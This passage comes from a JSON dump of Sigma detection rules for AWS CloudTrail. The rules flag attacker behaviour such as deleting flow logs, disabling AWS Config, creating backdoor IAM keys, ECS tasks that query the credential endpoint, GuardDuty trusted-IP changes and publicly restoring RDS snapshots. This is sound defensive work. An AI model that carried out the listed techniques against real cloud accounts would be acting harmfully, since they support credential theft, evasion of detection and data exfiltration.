    "content": "title: AWS VPC Flow Logs Deleted\nid: e386b9b5-af12-450e-afff-761730fb8a98\nstatus: experimental\ndescription: |\n    Detects the deletion of one or more VPC Flow Logs in AWS Elastic Compute Cloud (EC2) through the DeleteFlowLogs API call.\n    Adversaries may delete flow logs to evade detection or remove evidence of network activity, hindering forensic investigations and visibility into malicious operations.\nreferences:\n    - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html\n    - https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-flow-logs.html\n    - https://www.elastic.co/docs/reference/security/prebuilt-rules/rules/integrations/aws/defense_evasion_ec2_flow_log_deletion\nauthor: Ivan Saakov\ndate: 2025-10-19\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_event_name:\n        eventName: 'DeleteFlowLogs'\n    selection_status_success:\n        errorCode: 'Success'\n    selection_status_null:\n        errorCode: null\n    condition: selection_event_name and 1 of selection_status_*\nfalsepositives:\n    - During maintenance operations or testing, authorized administrators may delete VPC Flow Logs as part of routine network management or cleanup activities.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_config_disable_recording.yml",
    "content": "title: AWS Config Disabling Channel/Recorder\nid: 07330162-dba1-4746-8121-a9647d49d297\nstatus: test\ndescription: Detects AWS Config Service disabling\nreferences:\n    - https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html\nauthor: vitaliy0x1\ndate: 2020-01-21\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.008\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'config.amazonaws.com'\n        eventName:\n            - 'DeleteDeliveryChannel'\n            - 'StopConfigurationRecorder'\n    condition: selection\nfalsepositives:\n    - Valid change in AWS Config Service\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml",
    "content": "title: AWS Console GetSigninToken Potential Abuse\nid: f8103686-e3e8-46f3-be72-65f7fcb4aa53\nstatus: test\ndescription: |\n    Detects potentially suspicious events involving \"GetSigninToken\".\n    An adversary using the \"aws_consoler\" tool can leverage this console API to create temporary federated credentials that help obfuscate which AWS credential is compromised (the original access key) and enable the adversary to pivot from the AWS CLI to console sessions without the need for MFA, using the new access key issued in this request.\nreferences:\n    - https://github.com/NetSPI/aws_consoler\n    - https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/\nauthor: Chester Le Bron (@123Le_Bron)\ndate: 2024-02-26\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.t1021.007\n    - attack.t1550.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'signin.amazonaws.com'\n        eventName: 'GetSigninToken'\n    filter_main_console_ua:\n        userAgent|contains: 'Jersey/${project.version}'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - GetSigninToken events will occur when using the AWS SSO portal to log in and will generate false positives if you do not filter for the expected user agent(s); see the filter. Non-SSO configured roles would be abnormal and should be investigated.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_delete_identity.yml",
    "content": "title: SES Identity Has Been Deleted\nid: 20f754db-d025-4a8f-9d74-e0037e999a9a\nstatus: test\ndescription: Detects an instance of an SES identity being deleted via the \"DeleteIdentity\" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities\nreferences:\n    - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nauthor: Janantha Marasinghe\ndate: 2022-12-13\nmodified: 2022-12-28\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ses.amazonaws.com'\n        eventName: 'DeleteIdentity'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_delete_saml_provider.yml",
    "content": "title: AWS SAML Provider Deletion Activity\nid: ccd6a6c8-bb4e-4a91-9d2a-07e632819374\nstatus: experimental\ndescription: |\n    Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access.\n    An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.\nreferences:\n    - https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html\nauthor: Ivan Saakov\ndate: 2024-12-19\ntags:\n    - attack.t1078.004\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1531\n    - attack.impact\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'iam.amazonaws.com'\n        eventName: 'DeleteSAMLProvider'\n        status: 'success'\n    condition: selection\nfalsepositives:\n    - Automated processes using tools like Terraform may trigger this alert.\n    - Legitimate administrative actions by authorized system administrators could cause this alert. Verify the user identity, user agent, and hostname to ensure they are expected.\n    - Deletions by unfamiliar users should be investigated. If the behavior is known and expected, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_disable_bucket_versioning.yml",
    "content": "title: AWS S3 Bucket Versioning Disable\nid: a136ac98-b2bc-4189-a14d-f0d0388e57a7\nstatus: test\ndescription: Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.\nreferences:\n    - https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82\nauthor: Sean Johnstone | Unit 42\ndate: 2023-10-28\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: s3.amazonaws.com\n        eventName: PutBucketVersioning\n        requestParameters|contains: 'Suspended'\n    condition: selection\nfalsepositives:\n    - AWS administrator legitimately disabling bucket versioning\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_ec2_disable_encryption.yml",
    "content": "title: AWS EC2 Disable EBS Encryption\nid: 16124c2d-e40b-4fcc-8f2c-5ab7870a2223\nstatus: stable\ndescription: |\n  Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\n  Disabling default encryption does not change the encryption status of your existing volumes.\nreferences:\n    - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html\nauthor: Sittikorn S\ndate: 2021-06-29\nmodified: 2021-08-20\ntags:\n    - attack.impact\n    - attack.t1486\n    - attack.t1565\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: ec2.amazonaws.com\n        eventName: DisableEbsEncryptionByDefault\n    condition: selection\nfalsepositives:\n    - System Administrator Activities\n    - DEV, UAT, SAT environment. You should apply this rule with PROD account only.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_ec2_import_key_pair_activity.yml",
    "content": "title: AWS Key Pair Import Activity\nid: 92f84194-8d9a-4ee0-8699-c30bfac59780\nstatus: experimental\ndescription: |\n    Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.\nreferences:\n    - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html\nauthor: Ivan Saakov\ndate: 2024-12-19\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName: 'ImportKeyPair'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative actions by authorized users importing keys for valid purposes.\n    - Automated processes for infrastructure setup may trigger this alert.\n    - Verify the user identity, user agent, and source IP address to ensure they are expected.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_ec2_startup_script_change.yml",
    "content": "title: AWS EC2 Startup Shell Script Change\nid: 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df\nstatus: test\ndescription: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9\nauthor: faloker\ndate: 2020-02-12\nmodified: 2022-06-07\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1059.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: ec2.amazonaws.com\n        requestParameters.attribute: 'userData'\n        eventName: ModifyInstanceAttribute\n    condition: selection_source\nfalsepositives:\n    - Valid changes to the startup script\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_ec2_vm_export_failure.yml",
    "content": "title: AWS EC2 VM Export Failure\nid: 54b9a76a-3c71-4673-b4b3-2edb4566ea7b\nstatus: test\ndescription: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.\nreferences:\n    - https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance\nauthor: Diogo Braz\ndate: 2020-04-16\nmodified: 2022-10-05\ntags:\n    - attack.collection\n    - attack.t1005\n    - attack.exfiltration\n    - attack.t1537\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName: 'CreateInstanceExportTask'\n        eventSource: 'ec2.amazonaws.com'\n    filter1:\n        errorMessage|contains: '*'\n    filter2:\n        errorCode|contains: '*'\n    filter3:\n        responseElements|contains: 'Failure'\n    condition: selection and not 1 of filter*\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml",
    "content": "title: AWS ECS Task Definition That Queries The Credential Endpoint\nid: b94bf91e-c2bf-4047-9c43-c6810f43baad\nstatus: test\ndescription: |\n    Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.\n    This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py\n    - https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html\n    - https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html\nauthor: Darin Smith\ndate: 2022-06-07\nmodified: 2023-04-24\ntags:\n    - attack.persistence\n    - attack.t1525\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ecs.amazonaws.com'\n        eventName:\n            - 'DescribeTaskDefinition'\n            - 'RegisterTaskDefinition'\n            - 'RunTask'\n        requestParameters.containerDefinitions.command|contains: '$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'\n    condition: selection\nfalsepositives:\n    - Task Definition being modified to request credentials from the Task Metadata Service for valid reasons\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml",
    "content": "title: AWS EFS Fileshare Modified or Deleted\nid: 25cb1ba1-8a19-4a23-a198-d252664c8cef\nstatus: test\ndescription: |\n  Detects when an EFS Fileshare is modified or deleted.\n  You can't delete a file system that is in use.\n  If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\nreferences:\n    - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-15\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: elasticfilesystem.amazonaws.com\n        eventName: DeleteFileSystem\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml",
    "content": "title: AWS EFS Fileshare Mount Modified or Deleted\nid: 6a7ba45c-63d8-473e-9736-2eaabff79964\nstatus: test\ndescription: Detects when an EFS Fileshare Mount is modified or deleted. Deleting a mount target breaks any file system using it, which might disrupt instances or applications using those mounts.\nreferences:\n    - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-15\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: elasticfilesystem.amazonaws.com\n        eventName: DeleteMountTarget\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_eks_cluster_created_or_deleted.yml",
    "content": "title: AWS EKS Cluster Created or Deleted\nid: 33d50d03-20ec-4b74-a74e-1e65a38af1c0\nstatus: test\ndescription: Identifies when an EKS cluster is created or deleted.\nreferences:\n    - https://any-api.com/amazonaws_com/eks/docs/API_Description\nauthor: Austin Songer\ndate: 2021-08-16\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: eks.amazonaws.com\n        eventName:\n            - CreateCluster\n            - DeleteCluster\n    condition: selection\nfalsepositives:\n    - EKS Cluster being created or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_elasticache_security_group_created.yml",
    "content": "title: AWS ElastiCache Security Group Created\nid: 4ae68615-866f-4304-b24b-ba048dfa5ca7\nstatus: test\ndescription: Detects when an ElastiCache security group has been created.\nreferences:\n    - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.t1136\n    - attack.t1136.003\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: elasticache.amazonaws.com\n        eventName: 'CreateCacheSecurityGroup'\n    condition: selection\nfalsepositives:\n    - An ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml",
    "content": "title: AWS ElastiCache Security Group Modified or Deleted\nid: 7c797da2-9cf2-4523-ba64-33b06339f0cc\nstatus: test\ndescription: Identifies when an ElastiCache security group has been modified or deleted.\nreferences:\n    - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: elasticache.amazonaws.com\n        eventName:\n            - 'DeleteCacheSecurityGroup'\n            - 'AuthorizeCacheSecurityGroupIngress'\n            - 'RevokeCacheSecurityGroupIngress'\n            - 'AuthorizeCacheSecurityGroupEgress'\n            - 'RevokeCacheSecurityGroupEgress'\n    condition: selection\nfalsepositives:\n    - An ElastiCache security group modification or deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group changes from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_enum_buckets.yml",
    "content": "title: Potential Bucket Enumeration on AWS\nid: f305fd62-beca-47da-ad95-7690a0620084\nrelated:\n    - id: 4723218f-2048-41f6-bcb0-417f2d784f61\n      type: similar\nstatus: test\ndescription: Looks for potential enumeration of AWS buckets via ListBuckets.\nreferences:\n    - https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md\n    - https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html\n    - https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/\nauthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io\ndate: 2023-01-06\nmodified: 2024-07-10\ntags:\n    - attack.discovery\n    - attack.t1580\n    - attack.t1619\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 's3.amazonaws.com'\n        eventName: 'ListBuckets'\n    filter:\n        userIdentity.type: 'AssumedRole'\n    condition: selection and not filter\nfalsepositives:\n    - Administrators listing buckets; it may be necessary to filter out users who commonly conduct this activity.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_guardduty_disruption.yml",
    "content": "title: AWS GuardDuty Important Change\nid: 6e61ee20-ce00-4f8d-8aee-bedd8216f7e3\nstatus: test\ndescription: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9\nauthor: faloker\ndate: 2020-02-11\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: guardduty.amazonaws.com\n        eventName: CreateIPSet\n    condition: selection_source\nfalsepositives:\n    - Valid change in the GuardDuty (e.g. to ignore internal scanners)\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_iam_backdoor_users_keys.yml",
    "content": "title: AWS IAM Backdoor Users Keys\nid: 0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2\nstatus: test\ndescription: |\n  Detects AWS API key creation for a user by another user.\n  Backdoored users can be used to obtain persistence in the AWS environment.\n  Also with this alert, you can detect a flow of AWS keys in your org.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py\nauthor: faloker\ndate: 2020-02-12\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: iam.amazonaws.com\n        eventName: CreateAccessKey\n    filter:\n        userIdentity.arn|contains: responseElements.accessKey.userName\n    condition: selection_source and not filter\nfalsepositives:\n    - Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)\n    - AWS API keys legitimate exchange workflows\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml",
    "content": "title: AWS IAM S3Browser LoginProfile Creation\nid: db014773-b1d3-46bd-ba26-133337c0ffee\nstatus: test\ndescription: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.\nreferences:\n    - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor\nauthor: daniel.bohannon@permiso.io (@danielhbohannon)\ndate: 2023-05-17\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1059.009\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'iam.amazonaws.com'\n        eventName:\n            - 'GetLoginProfile'\n            - 'CreateLoginProfile'\n        userAgent|contains: 'S3 Browser'\n    condition: selection\nfalsepositives:\n    - Valid usage of S3 Browser for IAM LoginProfile listing and/or creation\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml",
    "content": "title: AWS IAM S3Browser Templated S3 Bucket Policy Creation\nid: db014773-7375-4f4e-b83b-133337c0ffee\nstatus: test\ndescription: Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of \"<YOUR-BUCKET-NAME>\".\nreferences:\n    - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor\nauthor: daniel.bohannon@permiso.io (@danielhbohannon)\ndate: 2023-05-17\ntags:\n    - attack.execution\n    - attack.t1059.009\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: iam.amazonaws.com\n        eventName: PutUserPolicy\n        userAgent|contains: 'S3 Browser'\n        requestParameters|contains|all:\n            - '\"arn:aws:s3:::<YOUR-BUCKET-NAME>/*\"'\n            - '\"s3:GetObject\"'\n            - '\"Allow\"'\n    condition: selection\nfalsepositives:\n    - Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml",
    "content": "title: AWS IAM S3Browser User or AccessKey Creation\nid: db014773-d9d9-4792-91e5-133337c0ffee\nstatus: test\ndescription: Detects S3 Browser utility creating IAM User or AccessKey.\nreferences:\n    - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor\nauthor: daniel.bohannon@permiso.io (@danielhbohannon)\ndate: 2023-05-17\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1059.009\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'iam.amazonaws.com'\n        eventName:\n            - 'CreateUser'\n            - 'CreateAccessKey'\n        userAgent|contains: 'S3 Browser'\n    condition: selection\nfalsepositives:\n    - Valid usage of S3 Browser for IAM User and/or AccessKey creation\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_kms_import_key_material.yml",
    "content": "title: AWS KMS Imported Key Material Usage\nid: 1279262f-1464-422f-ac0d-5b545320c526\nstatus: experimental\ndescription: |\n    Detects the import or deletion of key material in AWS KMS, which can be used as part of ransomware attacks. This activity is uncommon and provides a high-certainty signal.\nreferences:\n    - https://www.chrisfarris.com/post/effective-aws-ransomware/\n    - https://docs.aws.amazon.com/kms/latest/developerguide/ct-importkeymaterial.html\n    - https://docs.aws.amazon.com/kms/latest/developerguide/ct-deleteimportedkeymaterial.html\nauthor: toopricey\ndate: 2025-10-18\ntags:\n    - attack.impact\n    - attack.t1486\n    - attack.resource-development\n    - attack.t1608.003\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'kms.amazonaws.com'\n        eventName:\n            - 'ImportKeyMaterial'\n            - 'DeleteImportedKeyMaterial'\n    condition: selection\nfalsepositives:\n    - Legitimate use cases for imported key material are rare, but may include organizations with hybrid cloud architectures that import external key material for compliance requirements.\n    - Development or testing environments that simulate external key management scenarios. Even in these cases, such activity is typically infrequent and should not add significant noise.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_lambda_function_url.yml",
    "content": "title: New AWS Lambda Function URL Configuration Created\nid: ec541962-c05a-4420-b9ea-84de072d18f4\nstatus: experimental\ndescription: |\n    Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls.\n    This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\nreferences:\n    - https://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html\n    - https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc\n    - https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws\nauthor: Ivan Saakov\ndate: 2024-12-19\ntags:\n    - attack.initial-access\n    - attack.privilege-escalation\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: lambda.amazonaws.com\n        eventName: 'CreateFunctionUrlConfig'\n    condition: selection\nfalsepositives:\n    - Creating a Lambda function URL configuration may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Creating a Lambda function URL configuration from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_new_lambda_layer_attached.yml",
    "content": "title: AWS New Lambda Layer Attached\nid: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d\nstatus: test\ndescription: |\n  Detects when a user attaches a Lambda layer to an existing Lambda function.\n  A malicious Lambda layer could execute arbitrary code in the context of the function's IAM role.\n  This would give an adversary access to resources that the function has access to.\nreferences:\n    - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html\n    - https://github.com/clearvector/lambda-spy\nauthor: Austin Songer\ndate: 2021-09-23\nmodified: 2025-03-17\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: lambda.amazonaws.com\n        eventName|startswith: 'UpdateFunctionConfiguration'\n        requestParameters.layers|contains: '*'\n    condition: selection\nfalsepositives:\n    - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml",
    "content": "title: AWS Glue Development Endpoint Activity\nid: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26\nstatus: test\ndescription: Detects possibly suspicious Glue development endpoint activity.\nreferences:\n    - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/\n    - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html\nauthor: Austin Songer @austinsonger\ndate: 2021-10-03\nmodified: 2022-12-18\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'glue.amazonaws.com'\n        eventName:\n            - 'CreateDevEndpoint'\n            - 'DeleteDevEndpoint'\n            - 'UpdateDevEndpoint'\n    condition: selection\nfalsepositives:\n    - Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_rds_change_master_password.yml",
    "content": "title: AWS RDS Master Password Change\nid: 8a63cdd4-6207-414a-85bc-7e032bd3c1a2\nstatus: test\ndescription: Detects the change of a database master password. It may be a part of data exfiltration.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py\nauthor: faloker\ndate: 2020-02-12\nmodified: 2022-10-05\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: rds.amazonaws.com\n        responseElements.pendingModifiedValues.masterUserPassword|contains: '*'\n        eventName: ModifyDBInstance\n    condition: selection_source\nfalsepositives:\n    - Benign changes to a db instance\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_rds_dbcluster_actions.yml",
    "content": "title: Modification or Deletion of an AWS RDS Cluster\nid: 457cc9ac-d8e6-4d1d-8c0e-251d0f11a74c\nstatus: experimental\ndescription: Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.\nreferences:\n    - https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html\n    - https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html\n    - https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance\nauthor: Ivan Saakov\ndate: 2024-12-06\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: rds.amazonaws.com\n        eventName:\n            - ModifyDBCluster\n            - DeleteDBCluster\n    condition: selection\nfalsepositives:\n    - Verify if the modification or deletion was performed by an authorized administrator.\n    - Confirm if the modification or deletion was part of a planned change or maintenance activity.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_rds_public_db_restore.yml",
    "content": "title: Restore Public AWS RDS Instance\nid: c3f265c7-ff03-4056-8ab2-d486227b4599\nstatus: test\ndescription: Detects the restoration of a new publicly accessible database instance from a snapshot. It may be a part of data exfiltration.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py\nauthor: faloker\ndate: 2020-02-12\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: rds.amazonaws.com\n        responseElements.publiclyAccessible: 'true'\n        eventName: RestoreDBInstanceFromDBSnapshot\n    condition: selection_source\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
